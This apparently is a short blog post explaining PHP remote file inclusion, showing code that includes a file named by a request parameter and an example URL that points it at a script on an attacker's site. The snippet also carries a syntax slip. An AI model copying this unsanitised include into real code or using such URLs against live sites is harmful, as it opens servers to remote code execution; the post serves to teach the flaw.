Consider you have the following code
$file=$_REQUEST['q'];
include($file. ".php";)
Your url may be like this http://example.com/?q=login
so the login.php file will be included as per your code
Now the attacker plans pass a url through the query string
See the below
http://example.com/?q=http://www.attackerswebsite.com/hackingcode.php
If the url is passed in the query string
Now your code is
include('http://www.attackerswebsite.com/hackingcode.php.php')
If the attacker has the file hackingcode.php.php means the remote file will be included.
If the attacker included his code in your server means he can do any thing.
No comments:
Post a Comment